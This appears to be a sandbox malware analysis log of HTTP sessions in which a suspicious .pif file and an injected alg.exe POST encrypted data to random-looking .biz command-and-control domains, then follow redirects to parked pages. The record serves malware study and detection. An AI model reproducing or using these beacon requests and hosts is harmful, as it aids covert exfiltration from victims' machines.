                                                                                                                                                                                                                        Set-Cookie: btst=cbf3286d4089f0f57781e27b4d132dea|8.46.123.228|1733810742|1733810742|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.94972054.244.188.177807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.213071108 CET351OUTPOST /npdqgsoqmq HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.213103056 CET778OUTData Raw: 4f 98 9e 56 80 01 b3 69 fe 02 00 00 9e 7c 63 36 ed c0 fe 6d ee b1 89 5e f1 20 f1 d4 9d 7d c4 ae 82 09 37 8a 6d 46 ad 44 76 74 34 70 c3 3f 67 ce c8 13 9d bd 7f 6e ad 13 65 7c ce 29 69 4f ef 1b e9 78 62 fc 40 54 89 ec ee 38 c5 bc 46 80 4b ba 68 e3
                                                                                                                                                                                                                        Data Ascii: OVi|c6m^ }7mFDvt4p?gne|)iOxb@T8FKhG&&f/w']`!\d'eswRo69T=9)q%n?(B1[dd47xl<.X&#(d/l`[J.o }H?&LV5VC
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.555583954 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:44 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=44889ad4660603b1fdacd52293a7486b|8.46.123.228|1733810744|1733810744|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.2.949721172.234.222.143807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380510092 CET353OUTPOST /obujsmdylt HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.380527020 CET802OUTData Raw: ed 5c 2a 22 05 28 c7 82 16 03 00 00 c1 dc 74 8a 94 61 04 e2 4a b5 e5 2e 90 7e 43 af e8 1a 32 76 51 65 9d 52 ad 0e 7f 18 de 43 82 d2 28 ab cf fa 18 13 3b aa 16 3c 5f 29 19 5d 95 cf 6d 7f c4 25 53 03 7c e0 e2 fb 09 98 e7 7e 5f cf 67 cc 6e 1a 63 da
                                                                                                                                                                                                                        Data Ascii: \*"(taJ.~C2vQeRC(;<_)]m%S|~_gncJdXR4C$~}~.|W?2N"f6b&!|-^'Qa(1{FgxJ66OWYeq]v*7llhHVt#g5CbURWqY
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.509558916 CET472INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:44 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 142
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                        Location: http://ww99.przvgke.biz/obujsmdylt
                                                                                                                                                                                                                        Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.2.94972272.52.179.174807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.864082098 CET336OUTGET /obujsmdylt HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww99.przvgke.biz


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        10192.168.2.94972344.221.84.105807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879489899 CET354OUTPOST /cbecuogqej HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.879518032 CET778OUTData Raw: ba c1 d8 c5 57 c5 7f f4 fe 02 00 00 3b bc d1 79 10 a9 af ad b2 28 a8 4d e8 e1 a1 89 fb 2a b4 8b 3d 9d db a8 6c 3e 9b d6 2d 88 3d ef 9f 59 75 9e 59 de 36 32 f3 5c 89 a0 0b d2 17 72 3d ee 04 e1 63 91 95 01 c7 78 46 5a c1 ce 1f 8b 44 48 dc 00 88 9b
                                                                                                                                                                                                                        Data Ascii: W;y(M*=l>-=YuY62\r=cxFZDHu# _LF$mG%:j)Qr"j-c2Tz@viWC,97l/)W_&mLTS_4MPKV*D!l*IDU %w3+{Y|$_
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.976599932 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:45 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=46869c4ec47ae458ccca9a792d8d7594|8.46.123.228|1733810745|1733810745|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        11192.168.2.949724172.234.222.143807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371730089 CET348OUTPOST /bjede HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.371751070 CET778OUTData Raw: 5c e0 99 93 66 1a 2c 5a fe 02 00 00 b7 6c 35 38 46 bf a4 74 6c c0 95 03 2e 6f 91 55 eb 4e a0 10 1f 13 fa 70 76 3b 1a 28 11 a1 76 0a 7f 69 55 d9 7c 71 d4 c8 6e df 13 6f d9 91 c1 25 d2 0b 8c 3c 10 de f5 07 2b 02 35 32 b0 da 72 fe 61 f1 20 73 22 7a
                                                                                                                                                                                                                        Data Ascii: \f,Zl58Ftl.oUNpv;(viU|qno%<+52ra s"zS/3eaX8Jep$z#4#3YWp3jhvwMt~5[D=342S-Oh'zr&*B8x!%s_VX?2H#rKyI6L=dh!
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.499865055 CET467INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 142
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                        Location: http://ww99.przvgke.biz/bjede
                                                                                                                                                                                                                        Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493613958 CET349OUTPOST /fauopp HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493673086 CET778OUTData Raw: 99 11 6f 75 ac 1b c5 58 fe 02 00 00 06 2d 8e 99 43 1b 53 4c 2e 78 a4 17 21 0a 07 88 f4 1c e4 98 bc d6 ed ed ae f8 ea b3 25 e1 1b 23 4a 04 82 29 b0 bc bd f7 7e 57 49 cf f8 c0 8c a0 ef 6b e5 3a 61 ab 25 78 38 d7 7d 58 5c ca 0e 48 78 07 92 d9 5e 33
                                                                                                                                                                                                                        Data Ascii: ouX-CSL.x!%#J)~WIk:a%x8}X\Hx^3\(xPMHw^pKq0{D.+qD(5"$Bh?+g@{u~fi[U:I=~?:$WE2zf&[1C|U}Jl0?Klr4
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.833575964 CET468INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:54 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 142
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                        Location: http://ww99.przvgke.biz/fauopp
                                                                                                                                                                                                                        Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        12192.168.2.949726172.234.222.143807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.727335930 CET349OUTPOST /cairvr HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.727360010 CET802OUTData Raw: 25 87 ee c0 23 a0 aa be 16 03 00 00 e4 05 da b5 cd 31 53 16 e3 dc b4 54 7f aa d0 6f 43 d8 15 2b 74 c7 11 51 4b 45 c3 0b dd 13 15 00 14 10 50 00 eb c6 0b cd 45 fc af 89 ac 71 b6 05 5b 3a 2d 90 2f 5a 3d b7 97 82 d8 15 e9 45 ab ce 62 79 d4 ee f9 19
                                                                                                                                                                                                                        Data Ascii: %#1SToC+tQKEPEq[:-/Z=Eby&;s(d^3FFzdrN2\OiGnMC;p*6IKRfWaSGq\1;6(*eN4Z6I|2+)g6kM}s_/Fy{sI9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.828200102 CET468INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 142
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                        Location: http://ww99.przvgke.biz/cairvr
                                                                                                                                                                                                                        Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        13192.168.2.94972772.52.179.174807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.627351046 CET331OUTGET /bjede HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww99.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.307727098 CET280INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:52 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.846071005 CET332OUTGET /fauopp HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww99.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.223030090 CET281INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:55 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Location: http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        14192.168.2.94972872.52.179.174807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:47.950114965 CET332OUTGET /cairvr HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww99.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.316836119 CET280INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:52 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        15192.168.2.94972913.248.148.254807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839330912 CET356OUTGET /bjede?usid=18&utid=28672493896 HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww12.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.126724958 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:53 GMT
                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OvyNzL1fM3mGcXNtT9+uNK6KAFtCa27ji/Dc/AxSFrpeGBgDKuWeOjkwS/NVQfuEOmIOKbrnhef2rm2NBqYzvw==
                                                                                                                                                                                                                        X-Domain: przvgke.biz
                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127228022 CET1236INData Raw: 33 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                        Data Ascii: 3cb9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OvyNzL1fM3mGcXNtT9+uNK6KAFtCa27ji/Dc/AxSFrpeGBgDKuWeOjkwS/NVQfuEOmIOK
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127281904 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                                                                        Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127295971 CET1236INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127424002 CET1236INData Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                        Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127435923 CET1236INData Raw: 72 69 67 68 74 2e 20 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 6f 6e 43 6c 69 63 6b 3d 22 77 69 6e
                                                                                                                                                                                                                        Data Ascii: right. All Rights Reserved.<br/><br/><a href="javascript:void(0);" onClick="window.open('/privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privac
